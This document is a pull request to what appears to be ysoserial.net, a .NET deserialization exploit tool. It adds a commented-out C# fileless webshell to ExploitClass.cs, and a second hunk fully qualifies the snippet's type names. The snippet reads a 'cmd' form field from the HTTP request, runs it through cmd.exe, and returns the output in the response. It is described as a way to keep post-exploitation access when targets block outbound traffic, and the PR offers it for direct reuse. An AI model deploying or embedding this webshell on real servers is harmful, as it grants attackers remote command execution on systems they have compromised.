### PR TITLE
Add a fileless webshell example in ExploitClass

### DIFF
--- a/ysoserial/ExploitClass.cs
+++ b/ysoserial/ExploitClass.cs
@@ -38,9 +38,9 @@
                 /* Useful with ViewState plugin when target blocks all outgoing connection. */
                 /*
                 try {
-                    Process process = new Process();
+                    System.Diagnostics.Process process = new System.Diagnostics.Process();
                     process.StartInfo.FileName = "cmd.exe";
-                    string cmd = HttpContext.Current.Request.Form["cmd"];
+                    string cmd = System.Web.HttpContext.Current.Request.Form["cmd"];
                     process.StartInfo.Arguments = "/c " + cmd;
                     process.StartInfo.RedirectStandardOutput = true;
                     process.StartInfo.RedirectStandardError = true;
@@ -48,7 +48,7 @@
                     process.Start();
                     process.WaitForExit();
                     string output = process.StandardOutput.ReadToEnd();
-                    HttpContext.Current.Response.Write(output);
+                    System.Web.HttpContext.Current.Response.Write(output);
                 } catch (Exception) {}
                 */
 

--- a/ysoserial/ExploitClass.cs
+++ b/ysoserial/ExploitClass.cs
@@ -33,6 +33,26 @@
                 /* Causing a delay */
                 //System.Threading.Thread.Sleep(10000); // waits for 10 seconds
 
+
+                /* Executing a fileless webshell: -c "ExploitClass.cs;./dlls/System.dll;./dlls/System.Web.dll" */
+                /* Useful with ViewState plugin when target blocks all outgoing connection. */
+                /*
+                try {
+                    Process process = new Process();
+                    process.StartInfo.FileName = "cmd.exe";
+                    string cmd = HttpContext.Current.Request.Form["cmd"];
+                    process.StartInfo.Arguments = "/c " + cmd;
+                    process.StartInfo.RedirectStandardOutput = true;
+                    process.StartInfo.RedirectStandardError = true;
+                    process.StartInfo.UseShellExecute = false;
+                    process.Start();
+                    process.WaitForExit();
+                    string output = process.StandardOutput.ReadToEnd();
+                    HttpContext.Current.Response.Write(output);
+                } catch (Exception) {}
+                */
+
+
             //}
             //catch (Exception)
             //{


### PR DESCRIPTION
Hi,

I simply added a fileless webshell example in ExploitClass.cs
In my past pentesting experience, the target always blocks all outgoing connection.
So I usually use this webshell to do more post-exploitation work.

Just hope everyone including me can directly reuse the example and save some time.